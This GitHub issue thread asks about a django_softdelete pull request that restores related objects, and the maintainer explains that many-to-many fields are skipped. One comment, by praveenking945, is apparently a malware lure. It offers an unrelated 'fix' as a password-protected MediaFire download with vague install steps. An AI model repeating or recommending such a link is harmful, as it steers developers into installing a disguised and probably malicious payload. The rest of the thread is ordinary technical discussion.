### ISSUE TITLE
Question about the fix of automatic restoration of associated objects

### ISSUE THREAD

**Issue by Spawin** [san4ezy/django_softdelete#40]
To fix this issue https://github.com/san4ezy/django_softdelete/issues/35 we have this PR https://github.com/san4ezy/django_softdelete/pull/39 but there is a line of code that I don't understand. 
Why not put transaction_id here https://github.com/san4ezy/django_softdelete/blob/8740a5e2a87dbde55b9a450f80893584956e8ce6/django_softdelete/models.py#L294C12-L294C66 like this
`related_object.delete(strict=strict, transaction_id=transaction_id, *args, **kwargs)` ?

@milosnikic

**Comment by praveenking945** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by milosnikic** [comment]
@Spawin Hey, thanks for reaching to me. 
[That line](https://github.com/san4ezy/django_softdelete/blob/8740a5e2a87dbde55b9a450f80893584956e8ce6/django_softdelete/models.py#L294C12-L294C66) is labeled as M2M. I am not quite sure for the code execution flow. I didn't come across that use case. You can see [here](https://github.com/san4ezy/django_softdelete/blob/8740a5e2a87dbde55b9a450f80893584956e8ce6/django_softdelete/models.py#L84), method will iterate through all fields of the class. It will skip fields that are M2M. Only OneToMany and OneToOne fields would be processed.

**Comment by Spawin** [comment]
> @Spawin Hey, thanks for reaching to me. 
> [That line](https://github.com/san4ezy/django_softdelete/blob/8740a5e2a87dbde55b9a450f80893584956e8ce6/django_softdelete/models.py#L294C12-L294C66) is labeled as M2M. I am not quite sure for the code execution flow. I didn't come across that use case. You can see [here](https://github.com/san4ezy/django_softdelete/blob/8740a5e2a87dbde55b9a450f80893584956e8ce6/django_softdelete/models.py#L84), method will iterate through all fields of the class. It will skip fields that are M2M. Only OneToMany and OneToOne fields would be processed. 

Ok thanks 👍🏾
